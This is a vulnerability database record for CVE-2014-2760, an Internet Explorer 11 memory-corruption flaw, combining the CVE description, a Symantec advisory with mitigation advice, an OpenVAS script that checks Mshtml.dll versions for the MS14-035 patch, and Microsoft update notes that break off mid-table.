ID CVE-2014-2760 Type cve Reporter cve@mitre.org Modified 2018-10-12T22:06:00
Description
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1769, CVE-2014-1782, CVE-2014-1785, CVE-2014-2753, CVE-2014-2755, CVE-2014-2761, CVE-2014-2772, and CVE-2014-2776.
{"symantec": [{"lastseen": "2018-03-13T22:14:25", "bulletinFamily": "software", "cvelist": ["CVE-2014-2760"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions. Internet explorer 11 is vulnerable.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 \n * Avaya Aura Conferencing 7.0 \n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0.1 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.0 \n * Avaya Meeting Exchange - Client Registration Server 5.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.2 \n * Avaya Meeting Exchange - Client Registration Server 5.2.1 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Client Registration Server 6.2 \n * Avaya Meeting Exchange - Recording Server 5.2.1 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Recording Server 6.2 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0.1 \n * Avaya Meeting Exchange - Streaming Server 5.2 \n * Avaya Meeting Exchange - Streaming Server 5.2.1 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 6.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0.1 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2.1 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 6.2 \n * Avaya Meeting Exchange - Webportal 5.0 \n * Avaya Meeting Exchange - Webportal 5.0.1 \n * Avaya Meeting Exchange - Webportal 5.2 \n * Avaya Meeting Exchange - Webportal 5.2.1 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Meeting Exchange - Webportal 6.2 \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2014-06-10T00:00:00", "published": "2014-06-10T00:00:00", "id": "SMNTC-67846", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/67846", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2014-2760 Remote Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-10T19:52:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1802", "CVE-2014-1762", "CVE-2014-1773", "CVE-2014-1804", "CVE-2014-1790", "CVE-2014-1775", "CVE-2014-2761", "CVE-2014-1796", "CVE-2014-1786", "CVE-2014-1797", "CVE-2014-2760", "CVE-2014-1794", "CVE-2014-2757", "CVE-2014-2766", "CVE-2014-2776", "CVE-2014-1772", "CVE-2014-2754", "CVE-2014-2758", "CVE-2014-1784", "CVE-2014-2753", "CVE-2014-2771", "CVE-2014-1785", "CVE-2014-1803", "CVE-2014-1770", "CVE-2014-2777", "CVE-2014-0282", "CVE-2014-1789", "CVE-2014-1764", "CVE-2014-2756", "CVE-2014-1799", "CVE-2014-2772", "CVE-2014-1782", "CVE-2014-1766", "CVE-2014-2765", "CVE-2014-2767", "CVE-2014-1783", "CVE-2014-1800", "CVE-2014-2755", "CVE-2014-1780", "CVE-2014-1795", "CVE-2014-1792", "CVE-2014-1791", "CVE-2014-2763", "CVE-2014-2759", "CVE-2014-2768", "CVE-2014-1788", "CVE-2014-2775", "CVE-2014-2770", "CVE-2014-2769", "CVE-2014-1777", "CVE-2014-1778", "CVE-2014-2773", "CVE-2014-1771", "CVE-2014-1781", "CVE-2014-2764", "CVE-2014-1774", "CVE-2014-1805", "CVE-2014-1779", "CVE-2014-1769"], "description": "This host is missing a critical security update according to Microsoft\n Bulletin MS14-035.", "modified": "2020-06-09T00:00:00", "published": "2014-06-11T00:00:00", "id": "OPENVAS:1361412562310804595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804595", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2969262)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2969262)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804595\");\n script_version(\"2020-06-09T08:59:39+0000\");\n script_cve_id(\"CVE-2014-0282\", \"CVE-2014-1762\", \"CVE-2014-1764\", \"CVE-2014-1766\",\n \"CVE-2014-1769\", \"CVE-2014-1770\", \"CVE-2014-1771\", \"CVE-2014-1772\",\n \"CVE-2014-1773\", \"CVE-2014-1774\", \"CVE-2014-1775\", \"CVE-2014-1777\",\n \"CVE-2014-1778\", \"CVE-2014-1779\", \"CVE-2014-1780\", \"CVE-2014-1781\",\n \"CVE-2014-1782\", \"CVE-2014-1783\", \"CVE-2014-1784\", \"CVE-2014-1785\",\n \"CVE-2014-1786\", \"CVE-2014-1788\", \"CVE-2014-1789\", \"CVE-2014-1790\",\n \"CVE-2014-1791\", \"CVE-2014-1792\", \"CVE-2014-1794\", \"CVE-2014-1795\",\n \"CVE-2014-1796\", \"CVE-2014-1797\", \"CVE-2014-1799\", \"CVE-2014-1800\",\n \"CVE-2014-1802\", \"CVE-2014-1803\", \"CVE-2014-1804\", \"CVE-2014-1805\",\n \"CVE-2014-2753\", \"CVE-2014-2754\", \"CVE-2014-2755\", \"CVE-2014-2756\",\n \"CVE-2014-2757\", \"CVE-2014-2758\", \"CVE-2014-2759\", \"CVE-2014-2760\",\n \"CVE-2014-2761\", \"CVE-2014-2763\", \"CVE-2014-2764\", \"CVE-2014-2765\",\n \"CVE-2014-2766\", \"CVE-2014-2767\", \"CVE-2014-2768\", \"CVE-2014-2769\",\n \"CVE-2014-2770\", \"CVE-2014-2771\", \"CVE-2014-2772\", \"CVE-2014-2773\",\n \"CVE-2014-2775\", \"CVE-2014-2776\", \"CVE-2014-2777\");\n script_bugtraq_id(67862, 67511, 67295, 67518, 67863, 67544, 67861, 67864,\n 67866, 67867, 67871, 67869, 67882, 67872, 67873, 67874,\n 67875, 67876, 67877, 67878, 67879, 67880, 67881, 67883,\n 67884, 67885, 67886, 67887, 67889, 67890, 67891, 67831,\n 67833, 67834, 67835, 67836, 67838, 67839, 67840, 67841,\n 67842, 67843, 67845, 67846, 67847, 67915, 67848, 67849,\n 67850, 67851, 67852, 67854, 67855, 67856, 67857, 67858,\n 67859, 67860, 67892);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 08:59:39 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-06-11 08:05:23 +0530 (Wed, 11 Jun 2014)\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2969262)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to Microsoft\n Bulletin MS14-035.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A use-after-free error when handling CMarkup objects.\n\n - An error when handling negotiation of certificates during a TLS session.\n\n - Improper validation of certain permissions.\n\n - and multiple Unspecified errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to conduct session hijacking\n attacks, disclose potentially sensitive information, bypass certain security restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x/10.x/11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/2957689\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/2963950\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/ms14-035\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2,\n win7x64:2, win2008:3, win2008r2:2, win8:1,\n win8x64:1, win2012:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^([6-9|1[01])\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003:3, win2003x64:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5341\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.21388\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23597\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.19097\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.23388\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19538\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23597\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16554\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20665\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18471\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22685\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16554\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20665\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.16920\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.21000\", test_version2:\"10.0.9200.21043\")||\n version_in_range(version:dllVer, test_version:\"11.0.9600.00000\", test_version2:\"11.0.9600.16667\")||\n version_in_range(version:dllVer, test_version:\"11.0.9600.17000\", test_version2:\"11.0.9600.17125\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8:1, win2012:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.16920\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.21043\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"11.0.9600.00000\", test_version2:\"11.0.9600.16667\")||\n version_in_range(version:dllVer, test_version:\"11.0.9600.17000\", test_version2:\"11.0.9600.17125\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:42:09", "bulletinFamily": "microsoft", "cvelist": ["CVE-2014-1802", "CVE-2014-1762", "CVE-2014-1773", "CVE-2014-1804", "CVE-2014-1790", "CVE-2014-1775", "CVE-2014-2761", "CVE-2014-1796", "CVE-2014-2782", "CVE-2014-1786", "CVE-2014-1797", "CVE-2014-2760", "CVE-2014-1794", "CVE-2014-2757", "CVE-2014-2766", "CVE-2014-2776", "CVE-2014-1772", "CVE-2014-2754", "CVE-2014-2758", "CVE-2014-1784", "CVE-2014-2753", "CVE-2014-2771", "CVE-2014-1785", "CVE-2014-1803", "CVE-2014-1770", "CVE-2014-2777", "CVE-2014-0282", "CVE-2014-1789", "CVE-2014-1764", "CVE-2014-2756", "CVE-2014-1799", "CVE-2014-2772", "CVE-2014-1782", "CVE-2014-1766", "CVE-2014-2765", "CVE-2014-2767", "CVE-2014-1783", "CVE-2014-1800", "CVE-2014-2755", "CVE-2014-1780", "CVE-2014-1795", "CVE-2014-1792", "CVE-2014-1791", "CVE-2014-2763", "CVE-2014-2759", "CVE-2014-2768", "CVE-2014-1788", "CVE-2014-2775", "CVE-2014-2770", "CVE-2014-2769", "CVE-2014-1777", "CVE-2014-1778", "CVE-2014-2773", "CVE-2014-1771", "CVE-2014-1781", "CVE-2014-2764", "CVE-2014-1774", "CVE-2014-1805", "CVE-2014-1779", "CVE-2014-1769"], "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. We recommend that you install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-1\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"https://technet.microsoft.com/security/bulletin\" id=\"kb-link-2\" target=\"_self\">https://technet.microsoft.com/security/bulletin</a></div></div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS14-035. Learn more about how to obtain the fixes included in this security bulletin: <ul class=\"sbody-free_list\"><li>For individual, small business and organizational users, use the Windows automatic updating feature to install the fixes from Microsoft Update. To do this, see <a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-3\" target=\"_self\">Get security updates automatically</a> on the Microsoft Safety and Security Center website.</li><li> For IT professionals, see <a href=\"https://technet.microsoft.com/library/security/ms14-035\" id=\"kb-link-4\" target=\"_self\">Microsoft Security Bulletin MS14-035</a>.</li></ul><span></span></div><h2>Security update information</h2><div class=\"kb-summary-section section\">Depending on how your system is configured to receive updates, only one of the updates for Internet Explorer 11 may apply. <br/><br/>For systems running Internet Explorer 11 on Windows 7 or Windows Server 2008 R2:<ul class=\"sbody-free_list\"><li>The <a href=\"https://support.microsoft.com/en-us/help/2957689\" id=\"kb-link-5\">2957689 </a> update is for systems that have the 2929437 update installed.</li><li>The <a href=\"https://support.microsoft.com/en-us/help/2963950\" id=\"kb-link-6\">2963950 </a> update is for systems without the 2929437 update installed. Note that the 2963950 update is only available for customers managing updates using Windows Server Update Services (WSUS), Microsoft Intune, or System Center Configuration Manager.</li></ul>For systems running Internet Explorer 11 on Windows 8.1 or Windows Server 2012 R2: <ul class=\"sbody-free_list\"><li>The <a href=\"https://support.microsoft.com/en-us/help/2957689\" id=\"kb-link-7\">2957689 </a> update is for systems that have the 2919355 update installed.</li><li>The <a href=\"https://support.microsoft.com/en-us/help/2963950\" id=\"kb-link-8\">2963950 </a> update is for systems without the 2919355 update installed. Note that the 2963950 update is only available for customers managing updates using Windows Server Update Services (WSUS), Microsoft Intune, or System Center Configuration Manager.</li></ul><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-9\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-10\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-11\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-12\" target=\"_self\">International Support</a></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed under each article link. <ul class=\"sbody-free_list\"><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2963950\" id=\"kb-link-13\">2963950 </a> MS14-035: Security update for Internet Explorer 11 for systems that do not have update 2919355 (for Windows 8.1 or Windows Server 2012 R2) or update 2929437 (for Windows 7 SP1 or Windows Server 2008 R2 SP1) installed: June 10, 2014</div>Known issues in security update 2963950:<br/><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Issue</span>: I am running Internet Explorer 11, but I am not being offered this update. <br/><br/><span class=\"text-base\">Resolution</span>: Security update 2963950 is available only for customers who manage updates by using Windows Server Update Services (WSUS), Microsoft Intune, or Microsoft System Center Configuration Manager. </li></ul></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2957689\" id=\"kb-link-14\">2957689 </a> MS14-035: Security update for Internet Explorer versions 6, 7, 8, 9, 10, and 11: June 10, 2014</div>Known issues in security update 2957689:<br/><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Issue</span>: I am running Internet Explorer 11, but I am not being offered this update. <br/><br/><span class=\"text-base\">Resolution</span>: For Internet Explorer 11, security update 2957689 update is for systems that have the 2929437 update or the 2919355 update installed. Internet Explorer 11 customers have to make sure that the 2929437 update or the 2919355 update is installed before security update 2957689 can be offered to them or installed. <br/><br/><span class=\"text-base\">Note</span> For Internet Explorer 11 customers who do not have the 2929437 update or the 2919355 update installed, security update 2963950 can be installed instead of security update 2957689. However, security update 2963950 is available only for customers who manage updates by using Windows Server Update Services (WSUS), Microsoft Intune, or System Center Configuration Manager. </li></ul></li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes<br/></h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/> <br/><br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2965905\" id=\"kb-link-15\">2965905 </a></td><td class=\"sbody-td\">Element disappears in edge mode of Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2965686\" id=\"kb-link-16\">2965686 </a></td><td class=\"sbody-td\">Application performs slowly when using HttpOpenRequest function or Windows.Web.Http.HttpClient class to send HTTPS requests</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2965525\" id=\"kb-link-17\">2965525 </a></td><td class=\"sbody-td\">Cannot store new autocomplete values in Web Browser control host applications in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964869\" id=\"kb-link-18\">2964869 </a></td><td class=\"sbody-td\">Applications hosting Internet Explorer 11 do not zoom correctly when the system DPI is larger than 300%</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964867\" id=\"kb-link-19\">2964867 </a></td><td class=\"sbody-td\">Applications hosting Internet Explorer 11 do not zoom correctly when the system DPI is between 150% and 300%</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964865\" id=\"kb-link-20\">2964865 </a></td><td class=\"sbody-td\">The file name is invalid error message when you upload OneDrive placeholder files in Internet Explorer 11 for the desktop</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964864\" id=\"kb-link-21\">2964864 </a></td><td class=\"sbody-td\">Decrease the default cache size from 250 MB to 50 MB for Internet Explorer 11 on low disk space devices</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964862\" id=\"kb-link-22\">2964862 </a></td><td class=\"sbody-td\">Mouse events are not always triggered for SVG content in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964861\" id=\"kb-link-23\">2964861 </a></td><td class=\"sbody-td\">Roamed pinned sites are not live in the immersive mode of Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964857\" id=\"kb-link-24\">2964857 </a></td><td class=\"sbody-td\">Frame content is zoomed out in a new window when you reopen the frame in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964854\" id=\"kb-link-25\">2964854 </a></td><td class=\"sbody-td\">Page goes back without warning when you click the back navigation button in Internet Explorer 10 or Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964851\" id=\"kb-link-26\">2964851 </a></td><td class=\"sbody-td\">webpage could not be saved error when you save a webpage in Internet Explorer 10 or Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964850\" id=\"kb-link-27\">2964850 </a></td><td class=\"sbody-td\">Status bar text disappears when window resizes, tab switches, or other status bar layout changes in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964846\" id=\"kb-link-28\">2964846 </a></td><td class=\"sbody-td\">Search suggestions are not displayed when you type in the address bar in Internet Explorer 9 or Internet Explorer 10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964845\" id=\"kb-link-29\">2964845 </a></td><td class=\"sbody-td\">Send Feedback link is added to Reading View rendered content in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2964844\" id=\"kb-link-30\">2964844 </a></td><td class=\"sbody-td\">Viewport is not redrawn when you change the emulation resolution in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2956283\" id=\"kb-link-31\">2956283 </a></td><td class=\"sbody-td\">Internet Explorer 11 crashes when you turn on or turn off Enterprise Mode in the Tools menu</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2955390\" id=\"kb-link-32\">2955390 </a></td><td class=\"sbody-td\">BranchCache service does not work for Internet Explorer 10 or Internet Explorer 11 in Windows 7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2955388\" id=\"kb-link-33\">2955388 </a></td><td class=\"sbody-td\">Private bytes keep increasing when the deleteRow or deleteCell method is called in Internet Explorer</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2955387\" id=\"kb-link-34\">2955387 </a></td><td class=\"sbody-td\">Persistent cookies are not roamed in Internet Explorer 11 or Internet Explorer 10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2954771\" id=\"kb-link-35\">2954771 </a></td><td class=\"sbody-td\">Additional blank lines are displayed in an HTML document in Internet Explorer 10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2935514\" id=\"kb-link-36\">2935514 </a></td><td class=\"sbody-td\">Internet Explorer 9 crashes when you print a webpage by using Print Preview </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2935492\" id=\"kb-link-37\">2935492 </a></td><td class=\"sbody-td\">64-bit application cannot load Adobe Reader ActiveX control when the computer uses Internet Explorer</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2854645\" id=\"kb-link-38\">2854645 </a></td><td class=\"sbody-td\">No such interface supported error when you open a file through an FTP network location in Internet Explorer 11 or Internet Explorer 10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2974849\" id=\"kb-link-39\">2974849 </a></td><td class=\"sbody-td\">Page load time does not match in F12 tools console in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2974848\" id=\"kb-link-40\">2974848 </a></td><td class=\"sbody-td\">You cannot delete the local Enterprise Mode site list in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2974846\" id=\"kb-link-41\">2974846 </a></td><td class=\"sbody-td\">Webpage is displayed incorrectly and freezes when you scroll it in Internet Explorer 11 for the desktop</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2974844\" id=\"kb-link-42\">2974844 </a></td><td class=\"sbody-td\">Animation does not run correctly when the zoom level of Internet Explorer 11 is not 100 percent</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2974842\" id=\"kb-link-43\">2974842 </a></td><td class=\"sbody-td\">Input mode indicator is half-width katakana when you try to type inside a text box in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2974841\" id=\"kb-link-44\">2974841 </a></td><td class=\"sbody-td\">Animated GIF files do not play or loop correctly in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2974840\" id=\"kb-link-45\">2974840 </a></td><td class=\"sbody-td\">Internet Explorer 11 may crash when 